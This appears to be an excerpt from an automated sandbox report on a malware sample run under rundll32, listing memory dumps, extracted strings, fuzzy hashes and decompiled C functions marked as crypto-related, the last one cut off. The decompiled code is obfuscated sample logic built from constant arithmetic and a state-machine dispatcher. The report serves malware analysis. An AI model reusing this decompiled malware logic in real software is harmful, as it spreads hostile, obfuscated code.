Uniqueness

Uniqueness Score: -1.00%

Function 00176CA5, Relevance: 12.7, Strings: 10, Instructions: 191COMMON

Download Yara Rule

Strings

A, xrefs: 00176E2E
}/R4, xrefs: 00176FB4
#, xrefs: 00176D7B
}/R4, xrefs: 00176F40
GF5, xrefs: 00176FD8
Z, xrefs: 00176EFB
?, xrefs: 00176ED5
$ , xrefs: 00176D2E
Ki, xrefs: 00176CE6
)e, xrefs: 00176E82

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $ $)e$GF5$Ki$}/R4$}/R4$#$?$A$Z
API String ID: 0-3391024520
Opcode ID: 83fa3a6d39f62124582cc2ab0c530ec1acd6d0060c970106ab7acc3fc01164da
Instruction ID: 6c533083f31782a8ffaea369f10672a6c778189e6ff59f205b76d8835e5a8c28
Opcode Fuzzy Hash: 83fa3a6d39f62124582cc2ab0c530ec1acd6d0060c970106ab7acc3fc01164da
Instruction Fuzzy Hash: 8A912272008380AFE359CF65C98980BFBF1BBC5758F50890DF19696260D3BA8A59CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0044B165, Relevance: 11.6, Strings: 9, Instructions: 322
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0044B165(signed int __ecx, intOrPtr* __edx) {
				signed int _t355;
				void* _t362;
				short* _t366;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				short _t412;
				void* _t415;
				intOrPtr* _t419;
				void* _t421;

				 *(_t421 + 0x94) = 0x72b2ac;
				 *(_t421 + 0x98) = 0x3313a1;
				_t412 = 0;
				 *(_t421 + 0xa0) = __ecx;
				 *((intOrPtr*)(_t421 + 0xac)) = 0;
				_t419 = __edx;
				 *(_t421 + 0x28) = 0x912c;
				 *(_t421 + 0x28) =  *(_t421 + 0x28) | 0x96fb441e;
				_t415 = 0x7c0af2;
				_t371 = 0x53;
				 *(_t421 + 0x2c) =  *(_t421 + 0x28) / _t371;
				_t372 = 0x54;
				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) / _t372;
				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) ^ 0x00058b38;
				 *(_t421 + 0x5c) = 0xc013;
				 *(_t421 + 0x5c) =  *(_t421 + 0x5c) | 0xaee1eb4d;
				_t373 = 0x12;
				 *(_t421 + 0x58) =  *(_t421 + 0x5c) * 0x6b;
				 *(_t421 + 0x58) =  *(_t421 + 0x58) ^ 0x186d60a5;
				 *(_t421 + 0x3c) = 0xace2;
				 *(_t421 + 0x3c) =  *(_t421 + 0x3c) << 6;
				 *(_t421 + 0x3c) =  *(_t421 + 0x3c) + 0x7229;
				 *(_t421 + 0x3c) =  *(_t421 + 0x3c) ^ 0x402baaa9;
				 *(_t421 + 0x14) = 0xebdd;
				 *(_t421 + 0x14) =  *(_t421 + 0x14) >> 0xe;
				 *(_t421 + 0x14) =  *(_t421 + 0x14) * 6;
				 *(_t421 + 0x14) =  *(_t421 + 0x14) + 0xffffac6e;
				 *(_t421 + 0x14) =  *(_t421 + 0x14) ^ 0xffff9658;
				 *(_t421 + 0x7c) = 0xde69;
				 *(_t421 + 0x7c) =  *(_t421 + 0x7c) * 0x6f;
				 *(_t421 + 0x7c) =  *(_t421 + 0x7c) ^ 0x006039f6;
				 *(_t421 + 0x6c) = 0x3341;
				 *(_t421 + 0x6c) =  *(_t421 + 0x6c) / _t373;
				 *(_t421 + 0x6c) =  *(_t421 + 0x6c) * 0x2e;
				 *(_t421 + 0x6c) =  *(_t421 + 0x6c) ^ 0x0000be9a;
				 *(_t421 + 0x1c) = 0xbddd;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) * 0x3d;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) >> 8;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) + 0x3ffb;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) ^ 0x000052ea;
				 *(_t421 + 0x24) = 0xcd1f;
				 *(_t421 + 0x24) =  *(_t421 + 0x24) >> 0xa;
				 *(_t421 + 0x24) =  *(_t421 + 0x24) + 0xc8ca;
				 *(_t421 + 0x24) =  *(_t421 + 0x24) + 0xffff7446;
				 *(_t421 + 0x24) =  *(_t421 + 0x24) ^ 0x00001184;
				 *(_t421 + 0x68) = 0xd1f6;
				 *(_t421 + 0x68) =  *(_t421 + 0x68) ^ 0x7d0ee771;
				 *(_t421 + 0x68) =  *(_t421 + 0x68) | 0x146ba192;
				 *(_t421 + 0x68) =  *(_t421 + 0x68) ^ 0x7d6fd061;
				 *(_t421 + 0x2c) = 0x301e;
				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) * 0x69;
				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) + 0xffff2f7e;
				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) + 0x7add;
				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) ^ 0x00135481;
				 *(_t421 + 0x70) = 0x1444;
				 *(_t421 + 0x70) =  *(_t421 + 0x70) << 9;
				 *(_t421 + 0x70) =  *(_t421 + 0x70) * 0x58;
				 *(_t421 + 0x70) =  *(_t421 + 0x70) ^ 0x0deed291;
				 *(_t421 + 0x40) = 0xdbcb;
				 *(_t421 + 0x40) =  *(_t421 + 0x40) << 2;
				 *(_t421 + 0x40) =  *(_t421 + 0x40) + 0x85c1;
				 *(_t421 + 0x40) =  *(_t421 + 0x40) ^ 0x0003ec2c;
				 *(_t421 + 0x20) = 0xfb14;
				 *(_t421 + 0x20) =  *(_t421 + 0x20) >> 0xf;
				 *(_t421 + 0x20) =  *(_t421 + 0x20) + 0xffffe5e4;
				 *(_t421 + 0x20) =  *(_t421 + 0x20) ^ 0x8e096c3b;
				 *(_t421 + 0x20) =  *(_t421 + 0x20) ^ 0x71f69dd9;
				 *(_t421 + 0x78) = 0xa667;
				 *(_t421 + 0x78) =  *(_t421 + 0x78) << 9;
				_t374 = 0x4b;
				 *(_t421 + 0x7c) =  *(_t421 + 0x78) * 0x23;
				 *(_t421 + 0x7c) =  *(_t421 + 0x7c) ^ 0x2d804cb7;
				 *(_t421 + 0x4c) = 0x24eb;
				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) + 0xffff8a60;
				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) + 0x432e;
				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) ^ 0xffffdfad;
				 *(_t421 + 0x1c) = 0x8ff7;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) + 0xffff7e20;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) + 0x6b1c;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) | 0xe81a6241;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) ^ 0xe81a424f;
				 *(_t421 + 0xa0) = 0x8ec2;
				 *(_t421 + 0xa0) =  *(_t421 + 0xa0) * 0x28;
				 *(_t421 + 0xa0) =  *(_t421 + 0xa0) ^ 0x001611ad;
				 *(_t421 + 0x58) = 0x8fa;
				 *(_t421 + 0x58) =  *(_t421 + 0x58) ^ 0x94aafe32;
				 *(_t421 + 0x58) =  *(_t421 + 0x58) | 0x50621cea;
				 *(_t421 + 0x58) =  *(_t421 + 0x58) ^ 0xd4eaf643;
				 *(_t421 + 0x68) = 0x3e9e;
				 *(_t421 + 0x68) =  *(_t421 + 0x68) / _t374;
				 *(_t421 + 0x68) =  *(_t421 + 0x68) + 0x4fd4;
				 *(_t421 + 0x68) =  *(_t421 + 0x68) ^ 0x000029dc;
				 *(_t421 + 0x94) = 0x99a7;
				 *(_t421 + 0x94) =  *(_t421 + 0x94) >> 4;
				 *(_t421 + 0x94) =  *(_t421 + 0x94) ^ 0x00007b7a;
				 *(_t421 + 0x38) = 0x83e0;
				 *(_t421 + 0x38) =  *(_t421 + 0x38) >> 0xb;
				 *(_t421 + 0x38) =  *(_t421 + 0x38) << 9;
				 *(_t421 + 0x38) =  *(_t421 + 0x38) ^ 0x00004453;
				 *(_t421 + 0x60) = 0xe6f7;
				 *(_t421 + 0x60) =  *(_t421 + 0x60) | 0x7af10f83;
				 *(_t421 + 0x60) =  *(_t421 + 0x60) << 3;
				 *(_t421 + 0x60) =  *(_t421 + 0x60) ^ 0xd78f39d0;
				 *(_t421 + 0x78) = 0x97e9;
				 *(_t421 + 0x78) =  *(_t421 + 0x78) + 0x9235;
				_t375 = 0xe;
				 *(_t421 + 0x74) =  *(_t421 + 0x78) / _t375;
				 *(_t421 + 0x74) =  *(_t421 + 0x74) ^ 0x000018b2;
				 *(_t421 + 0x30) = 0xd59f;
				 *(_t421 + 0x30) =  *(_t421 + 0x30) << 7;
				 *(_t421 + 0x30) =  *(_t421 + 0x30) << 7;
				 *(_t421 + 0x30) =  *(_t421 + 0x30) << 0xa;
				 *(_t421 + 0x30) =  *(_t421 + 0x30) ^ 0x9f00725b;
				 *(_t421 + 0x38) = 0xa6ba;
				 *(_t421 + 0x38) =  *(_t421 + 0x38) << 0x10;
				 *(_t421 + 0x38) =  *(_t421 + 0x38) >> 0xc;
				 *(_t421 + 0x38) =  *(_t421 + 0x38) ^ 0x000a754c;
				 *(_t421 + 0x60) = 0x53a7;
				 *(_t421 + 0x60) =  *(_t421 + 0x60) << 3;
				 *(_t421 + 0x60) =  *(_t421 + 0x60) + 0x2bc6;
				 *(_t421 + 0x60) =  *(_t421 + 0x60) ^ 0x0002e6e9;
				 *(_t421 + 0x50) = 0x9b50;
				 *(_t421 + 0x50) =  *(_t421 + 0x50) >> 5;
				 *(_t421 + 0x50) =  *(_t421 + 0x50) >> 0xe;
				 *(_t421 + 0x50) =  *(_t421 + 0x50) ^ 0x00007f5d;
				 *(_t421 + 0x4c) = 0x566e;
				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) + 0x42f2;
				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) + 0x9896;
				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) ^ 0x00014aa9;
				 *(_t421 + 0x94) = 0x126;
				 *(_t421 + 0x94) =  *(_t421 + 0x94) + 0xffffea10;
				 *(_t421 + 0x94) =  *(_t421 + 0x94) ^ 0xffffa88e;
				 *(_t421 + 0x88) = 0x5486;
				_t376 = 0x51;
				 *(_t421 + 0x8c) =  *(_t421 + 0x88) / _t376;
				 *(_t421 + 0x8c) =  *(_t421 + 0x8c) ^ 0x00007ea1;
				 *(_t421 + 0x14) = 0x191d;
				 *(_t421 + 0x14) =  *(_t421 + 0x14) + 0x9b5;
				 *(_t421 + 0x14) =  *(_t421 + 0x14) >> 5;
				_t377 = 6;
				_t368 =  *(_t421 + 0xa0);
				 *(_t421 + 0x10) =  *(_t421 + 0x14) / _t377;
				 *(_t421 + 0x10) =  *(_t421 + 0x10) ^ 0x0000160b;
				 *(_t421 + 0x98) = 0x6a77;
				 *(_t421 + 0x98) =  *(_t421 + 0x98) ^ 0x34a50dbd;
				 *(_t421 + 0x98) =  *(_t421 + 0x98) ^ 0x34a50f69;
				 *(_t421 + 0x44) = 0x7616;
				 *(_t421 + 0x44) =  *(_t421 + 0x44) + 0xffff0287;
				 *(_t421 + 0x44) =  *(_t421 + 0x44) + 0xffff9d7b;
				 *(_t421 + 0x44) =  *(_t421 + 0x44) ^ 0xffff183e;
				 *(_t421 + 0x8c) = 0xc1dc;
				 *(_t421 + 0x8c) =  *(_t421 + 0x8c) + 0x7d7c;
				 *(_t421 + 0x8c) =  *(_t421 + 0x8c) ^ 0x00013d0b;
				 *(_t421 + 0x84) = 0xc54;
				 *(_t421 + 0x84) =  *(_t421 + 0x84) >> 7;
				 *(_t421 + 0x84) =  *(_t421 + 0x84) ^ 0x0000610f;
				 *(_t421 + 0x80) = 0xb84f;
				 *(_t421 + 0x80) =  *(_t421 + 0x80) | 0xe7d082ca;
				 *(_t421 + 0x80) =  *(_t421 + 0x80) ^ 0xe7d0dc6c;
				do {
					while(_t415 != 0x7c0af2) {
						if(_t415 == 0x131e8aac) {
							_push(_t377);
							_t377 = 0;
							_t355 = E0044C0C8(0,  *((intOrPtr*)(_t421 + 0x64)),  *((intOrPtr*)(_t421 + 0x54)),  *((intOrPtr*)(_t421 + 0x4e8)),  *((intOrPtr*)(_t421 + 0x54)),  *(_t421 + 0x78),  *(_t421 + 0x6c),  *(_t421 + 0x60), 0,  *(_t421 + 0x30),  *(_t421 + 0x50));
							_t368 = _t355;
							_t421 = _t421 + 0x28;
							__eflags = _t355 - 0xffffffff;
							if(__eflags != 0) {
								_t415 = 0x17f63d9e;
								continue;
							}
						} else {
							if(_t415 == 0x1531e410) {
								_push( *((intOrPtr*)(_t421 + 0x4c4)));
								_push( *(_t421 + 0x1c));
								_push( *(_t421 + 0x50));
								E0044BAEC(0x104, __eflags,  *(_t421 + 0x7c), E00435DFC( *(_t421 + 0x2c),  *(_t421 + 0x84), __eflags), _t421 + 0x2cc,  *(_t421 + 0x80),  *((intOrPtr*)(_t421 + 0xa8)),  *((intOrPtr*)(_t421 + 0x4dc)),  *((intOrPtr*)(_t421 + 0xb0)), _t421 + 0xbc);
								_t377 =  *(_t421 + 0x68);
								E00440D6D(_t377,  *((intOrPtr*)(_t421 + 0x90)),  *((intOrPtr*)(_t421 + 0xa4)), _t357);
								_t421 = _t421 + 0x34;
								_t415 = 0x131e8aac;
								continue;
							} else {
								if(_t415 == 0x17f63d9e) {
									_t298 = _t419 + 4; // 0xffff2ff9
									_t362 = E004469AC( *((intOrPtr*)(_t421 + 0xac)), _t298,  *_t419,  *((intOrPtr*)(_t421 + 0x9c)),  *(_t421 + 0x20), _t368,  *(_t421 + 0xa0), _t377,  *_t298);
									_t421 = _t421 + 0x1c;
									_t377 = 1;
									_t415 = 0x1a33388b;
									__eflags = _t362;
									_t412 =  !=  ? 1 : _t412;
									continue;
								} else {
									if(_t415 == 0x1a33388b) {
										E0043F1ED( *(_t421 + 0x50),  *(_t421 + 0x98),  *(_t421 + 0x8c),  *(_t421 + 0x84), _t368);
									} else {
										if(_t415 == 0x2700e9a0) {
											E00442631( *((intOrPtr*)(_t421 + 0x34)), _t421 + 0x2bc, __eflags,  *(_t421 + 0x74),  *(_t421 + 0x40));
											_pop(_t377);
											_t415 = 0x1531e410;
											continue;
										} else {
											_t430 = _t415 - 0x287e9283;
											if(_t415 != 0x287e9283) {
												goto L15;
											} else {
												_push(_t377);
												E0043DFD8( *(_t421 + 0x20), _t421 + 0xb8, _t430,  *(_t421 + 0x84),  *(_t421 + 0x70));
												_t366 = E0043BDCC(_t421 + 0xc0,  *(_t421 + 0x30),  *((intOrPtr*)(_t421 + 0x34)),  *(_t421 + 0x74));
												_t421 = _t421 + 0x14;
												_t415 = 0x2700e9a0;
												_t377 = 0;
												 *_t366 = 0;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t412;
					}
					_t415 = 0x287e9283;
					L15:
					__eflags = _t415 - 0x2b84612a;
				} while (__eflags != 0);
				goto L18;
			}

0x0044b16b
0x0044b176
0x0044b185
0x0044b187
0x0044b18e
0x0044b195
0x0044b197
0x0044b1a1
0x0044b1a9
0x0044b1b4
0x0044b1b9
0x0044b1c3
0x0044b1c8
0x0044b1ce
0x0044b1d6
0x0044b1de
0x0044b1eb
0x0044b1ec
0x0044b1f0
0x0044b1f8
0x0044b200
0x0044b205
0x0044b20d
0x0044b215
0x0044b21d
0x0044b227
0x0044b22b
0x0044b233
0x0044b23b
0x0044b248
0x0044b24c
0x0044b254
0x0044b262
0x0044b26b
0x0044b26f
0x0044b277
0x0044b284
0x0044b288
0x0044b28d
0x0044b295
0x0044b29d
0x0044b2a5
0x0044b2aa
0x0044b2b2
0x0044b2ba
0x0044b2c2
0x0044b2ca
0x0044b2d2
0x0044b2da
0x0044b2e2
0x0044b2ef
0x0044b2f3
0x0044b2fb
0x0044b303
0x0044b30b
0x0044b313
0x0044b31d
0x0044b321
0x0044b329
0x0044b333
0x0044b338
0x0044b340
0x0044b348
0x0044b350
0x0044b355
0x0044b35d
0x0044b365
0x0044b36d
0x0044b375
0x0044b381
0x0044b384
0x0044b388
0x0044b390
0x0044b398
0x0044b3a0
0x0044b3a8
0x0044b3b0
0x0044b3b8
0x0044b3c0
0x0044b3c8
0x0044b3d0
0x0044b3d8
0x0044b3eb
0x0044b3f2
0x0044b3fd
0x0044b405
0x0044b40d
0x0044b415
0x0044b41d
0x0044b42d
0x0044b431
0x0044b439
0x0044b441
0x0044b44c
0x0044b454
0x0044b45f
0x0044b467
0x0044b46c
0x0044b471
0x0044b479
0x0044b481
0x0044b489
0x0044b48e
0x0044b496
0x0044b49e
0x0044b4aa
0x0044b4ad
0x0044b4b1
0x0044b4b9
0x0044b4c1
0x0044b4c6
0x0044b4cb
0x0044b4d0
0x0044b4d8
0x0044b4e0
0x0044b4e5
0x0044b4ea
0x0044b4f2
0x0044b4fa
0x0044b4ff
0x0044b507
0x0044b50f
0x0044b517
0x0044b51c
0x0044b521
0x0044b529
0x0044b531
0x0044b539
0x0044b541
0x0044b549
0x0044b556
0x0044b561
0x0044b56c
0x0044b580
0x0044b585
0x0044b58e
0x0044b599
0x0044b5a1
0x0044b5a9
0x0044b5b2
0x0044b5b5
0x0044b5bc
0x0044b5c0
0x0044b5c8
0x0044b5d3
0x0044b5de
0x0044b5e9
0x0044b5f1
0x0044b5f9
0x0044b601
0x0044b609
0x0044b614
0x0044b61f
0x0044b62a
0x0044b635
0x0044b63d
0x0044b648
0x0044b653
0x0044b65e
0x0044b669
0x0044b669
0x0044b67b
0x0044b7e8
0x0044b7f6
0x0044b813
0x0044b818
0x0044b81a
0x0044b81d
0x0044b820
0x0044b822
0x00000000
0x0044b822
0x0044b681
0x0044b687
0x0044b760
0x0044b767
0x0044b76b
0x0044b7be
0x0044b7d2
0x0044b7d6
0x0044b7db
0x0044b7de
0x00000000
0x0044b68d
0x0044b693
0x0044b723
0x0044b746
0x0044b74d
0x0044b750
0x0044b751
0x0044b756
0x0044b758
0x00000000
0x0044b699
0x0044b69f
0x0044b859
0x0044b6a5
0x0044b6ab
0x0044b712
0x0044b718
0x0044b719
0x00000000
0x0044b6ad
0x0044b6ad
0x0044b6b3
0x00000000
0x0044b6b9
0x0044b6b9
0x0044b6d0
0x0044b6e8
0x0044b6ed
0x0044b6f0
0x0044b6f5
0x0044b6f7
0x00000000
0x0044b6f7
0x0044b6b3
0x0044b6ab
0x0044b69f
0x0044b693
0x0044b687
0x0044b861
0x0044b86d
0x0044b86d
0x0044b82c
0x0044b831
0x0044b831
0x0044b831
0x00000000

Strings

R, xrefs: 0044B295
z{, xrefs: 0044B454
Lu, xrefs: 0044B4EA
)r, xrefs: 0044B205
[r, xrefs: 0044B4D0
wj, xrefs: 0044B5C8
nV, xrefs: 0044B529
A3, xrefs: 0044B254
|}, xrefs: 0044B614

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )r$A3$Lu$[r$nV$wj$z{$|}$R
API String ID: 0-850793479
Opcode ID: d0681bbcf1d8c2ae31e0750e38afae1e1e02a7d62d883bf6dc7be4e0de3dd199
Instruction ID: 87ce82bdc96fed07c5252dfff0dd9d875584d997109566f5c06fca8141705abd
Opcode Fuzzy Hash: d0681bbcf1d8c2ae31e0750e38afae1e1e02a7d62d883bf6dc7be4e0de3dd199
Instruction Fuzzy Hash: 28F1E1715087819FE768CF21C48AA4BBBE1FBC4318F10891DF5E9962A0D7B98949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0018A6D9, Relevance: 11.6, Strings: 9, Instructions: 322COMMON

Download Yara Rule

Strings

)r, xrefs: 0018A779
nV, xrefs: 0018AA9D
R, xrefs: 0018A809
[r, xrefs: 0018AA44
z{, xrefs: 0018A9C8
wj, xrefs: 0018AB3C
A3, xrefs: 0018A7C8
|}, xrefs: 0018AB88
Lu, xrefs: 0018AA5E

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )r$A3$Lu$[r$nV$wj$z{$|}$R
API String ID: 0-850793479
Opcode ID: 6e6897a998e18687a9f3c11353b0d64c9edf89887ff37091b059f781d74057a9
Instruction ID: a98e9a197c90c5f1315033793e75b6284945ff4e5761e9c07795527b6da9b440
Opcode Fuzzy Hash: 6e6897a998e18687a9f3c11353b0d64c9edf89887ff37091b059f781d74057a9
Instruction Fuzzy Hash: 04F1F2715087819FE368CF21C48AA4BBBE1BFC4318F508A1DF5E9962A0D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00448C2B, Relevance: 11.6, Strings: 9, Instructions: 310
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00448C2B() {
				char _v520;
				short _v524;
				short _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr* _v544;
				intOrPtr _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				void* _t300;
				intOrPtr _t302;
				short _t306;
				short _t308;
				short _t309;
				intOrPtr _t312;
				void* _t317;
				intOrPtr* _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				intOrPtr _t353;
				intOrPtr* _t354;
				short _t355;
				signed int* _t357;

				_t357 =  &_v680;
				_v536 = 0x205681;
				_v532 = 0x662dd;
				_t317 = 0x1e086586;
				_t355 = 0;
				_v528 = 0;
				_v524 = 0;
				_v652 = 0xf058;
				_t350 = 0x3f;
				_v652 = _v652 / _t350;
				_v652 = _v652 ^ 0xf52b0b85;
				_v652 = _v652 ^ 0x1b04eaa7;
				_v652 = _v652 ^ 0xee2fe2f3;
				_v604 = 0x95c0;
				_v604 = _v604 | 0x84eb5d1b;
				_v604 = _v604 ^ 0x37b71fa3;
				_v604 = _v604 ^ 0xb35cc279;
				_v632 = 0xdad5;
				_v632 = _v632 >> 1;
				_v632 = _v632 | 0x6db5f9e1;
				_v632 = _v632 ^ 0x6db5e788;
				_v616 = 0xf7c4;
				_v616 = _v616 + 0xffffc625;
				_v616 = _v616 + 0x83c2;
				_v616 = _v616 ^ 0x000171e4;
				_v620 = 0xd68a;
				_v620 = _v620 ^ 0xd8043047;
				_v620 = _v620 + 0xb99d;
				_v620 = _v620 ^ 0xd805aeb2;
				_v600 = 0xba3e;
				_v600 = _v600 + 0xffff4aed;
				_v600 = _v600 ^ 0xbcc6d77f;
				_v600 = _v600 ^ 0xbcc6d5de;
				_v676 = 0x731e;
				_v676 = _v676 ^ 0x5ee95724;
				_v676 = _v676 << 1;
				_v676 = _v676 ^ 0x578f8622;
				_v676 = _v676 ^ 0xea5dba2f;
				_v564 = 0xdb79;
				_v564 = _v564 + 0xffff5324;
				_v564 = _v564 ^ 0x000059e2;
				_v656 = 0x318b;
				_v656 = _v656 * 0x75;
				_v656 = _v656 | 0xae3833e5;
				_v656 = _v656 ^ 0x79d8626c;
				_v656 = _v656 ^ 0xd7e6dd07;
				_v612 = 0xd72f;
				_v612 = _v612 | 0xacf7f151;
				_v612 = _v612 << 0x10;
				_v612 = _v612 ^ 0xf77f2cdc;
				_v588 = 0x6e25;
				_v588 = _v588 | 0xb635d493;
				_v588 = _v588 ^ 0xb635a7f6;
				_v664 = 0x854b;
				_v664 = _v664 >> 2;
				_v664 = _v664 + 0xffff5540;
				_v664 = _v664 + 0xffff815d;
				_v664 = _v664 ^ 0xfffeba3d;
				_v628 = 0x2397;
				_v628 = _v628 ^ 0xd486bf36;
				_v628 = _v628 * 0x57;
				_v628 = _v628 ^ 0x39bf10ef;
				_v592 = 0x332f;
				_v592 = _v592 << 0xf;
				_v592 = _v592 ^ 0x1997d067;
				_v584 = 0x9daa;
				_v584 = _v584 ^ 0xc1827730;
				_v584 = _v584 ^ 0xc182cb74;
				_v552 = 0xead9;
				_v552 = _v552 << 0x10;
				_v552 = _v552 ^ 0xead93b3b;
				_v568 = 0x955d;
				_v568 = _v568 >> 4;
				_v568 = _v568 ^ 0x00001627;
				_v668 = 0x4c8;
				_v668 = _v668 << 5;
				_v668 = _v668 + 0xabe4;
				_v668 = _v668 | 0x24ffa7bc;
				_v668 = _v668 ^ 0x24fff134;
				_v608 = 0xf88a;
				_v608 = _v608 ^ 0x49fbfdea;
				_v608 = _v608 << 5;
				_v608 = _v608 ^ 0x3f60b2d9;
				_v660 = 0xc005;
				_v660 = _v660 << 0xa;
				_v660 = _v660 ^ 0xddadac51;
				_v660 = _v660 | 0xebc284be;
				_v660 = _v660 ^ 0xffefbdbf;
				_v560 = 0xaa76;
				_v560 = _v560 >> 0xa;
				_v560 = _v560 ^ 0x0000145f;
				_v680 = 0x11f3;
				_v680 = _v680 >> 0x10;
				_v680 = _v680 + 0x9fae;
				_v680 = _v680 + 0xffffa8e8;
				_v680 = _v680 ^ 0x000040be;
				_v556 = 0x5f3c;
				_v556 = _v556 << 0xd;
				_v556 = _v556 ^ 0x0be7cdfb;
				_v640 = 0x303f;
				_v640 = _v640 | 0xdf49b5a6;
				_v640 = _v640 + 0xffffa103;
				_v640 = _v640 ^ 0xdf496290;
				_v636 = 0xc44a;
				_v636 = _v636 << 9;
				_t351 = 0x24;
				_v636 = _v636 / _t351;
				_v636 = _v636 ^ 0x000ae4ba;
				_v672 = 0xae3b;
				_v672 = _v672 | 0xebb53fed;
				_v672 = _v672 << 0xa;
				_v672 = _v672 ^ 0xd6fff3bd;
				_v576 = 0x604f;
				_v576 = _v576 + 0x4aad;
				_v576 = _v576 ^ 0x0000811b;
				_v624 = 0x82fc;
				_t352 = 0x4d;
				_t349 = _v544;
				_t316 = _v544;
				_v624 = _v624 * 0xb;
				_v624 = _v624 ^ 0xf6599f92;
				_v624 = _v624 ^ 0xf65c714c;
				_v572 = 0x87e5;
				_v572 = _v572 | 0x0de14e4e;
				_v572 = _v572 ^ 0x0de1e3d5;
				_v580 = 0xaa00;
				_v580 = _v580 >> 0xf;
				_v580 = _v580 ^ 0x00000356;
				_v596 = 0x78ee;
				_v596 = _v596 * 0x44;
				_v596 = _v596 >> 1;
				_v596 = _v596 ^ 0x00108f9c;
				_v648 = 0x727e;
				_t353 = _v548;
				_v648 = _v648 / _t352;
				_v648 = _v648 ^ 0x94612659;
				_v648 = _v648 + 0xffff79fc;
				_v648 = _v648 ^ 0x9460d1f8;
				_v644 = 0x1b66;
				_v644 = _v644 ^ 0x7f7a90b3;
				_v644 = _v644 ^ 0x38b35886;
				_v644 = _v644 ^ 0x47c9d350;
				while(1) {
					_t300 = 0xbce5228;
					L2:
					while(_t317 != 0x31c8274) {
						if(_t317 == 0x6eb678d) {
							E0043F1ED(_v572, _v580, _v596, _v648, _t316);
						} else {
							if(_t317 == _t300) {
								_t306 = E0043ACE6(_t349, _v552, _t317, _t317, _t316, _t353, _v568, _v652, _v668, _v608, _t317,  &_v540, _v660, _v560);
								_t357 =  &(_t357[0xc]);
								__eflags = _t306;
								if(_t306 != 0) {
									_t354 = _t349;
									while(1) {
										__eflags =  *((intOrPtr*)(_t354 + 4)) - 4;
										if( *((intOrPtr*)(_t354 + 4)) != 4) {
											goto L17;
										}
										L16:
										_t309 = E00437F4B(_t354 + 0xc, _v680, _v544, _v556, _v640);
										_t357 =  &(_t357[3]);
										__eflags = _t309;
										if(_t309 == 0) {
											_t355 = 1;
											__eflags = 1;
										} else {
											goto L17;
										}
										L20:
										_t353 = _v548;
										goto L21;
										L17:
										_t308 =  *_t354;
										__eflags = _t308;
										if(_t308 != 0) {
											_t354 = _t354 + _t308;
											__eflags =  *((intOrPtr*)(_t354 + 4)) - 4;
											if( *((intOrPtr*)(_t354 + 4)) != 4) {
												goto L17;
											}
										}
										goto L20;
									}
								}
								L21:
								__eflags = _t355;
								if(__eflags == 0) {
									_t300 = 0xbce5228;
									_t317 = 0xbce5228;
									continue;
								} else {
									E00442551(_v636,  *((intOrPtr*)( *0x451090 + 0x1c)), _v672);
									_t317 = 0xc17c725;
									while(1) {
										_t300 = 0xbce5228;
										goto L2;
									}
								}
								L31:
							} else {
								if(_t317 == 0xc17c725) {
									E0043DE81(_v576, _t349, _v624);
									_t317 = 0x6eb678d;
									while(1) {
										_t300 = 0xbce5228;
										goto L2;
									}
								} else {
									if(_t317 == 0x1e086586) {
										_t317 = 0x1e3f627f;
										continue;
									} else {
										if(_t317 == 0x1e3f627f) {
											_push(_t317);
											E0043DFD8(_v632,  &_v520, __eflags, _v616, _v620);
											_t312 = E0043BDCC( &_v520, _v600, _v676, _v564);
											_t357 =  &(_t357[5]);
											_v544 = _t312;
											 *((short*)(_t312 - 2)) = 0;
											_t317 = 0x31c8274;
											while(1) {
												_t300 = 0xbce5228;
												goto L2;
											}
										} else {
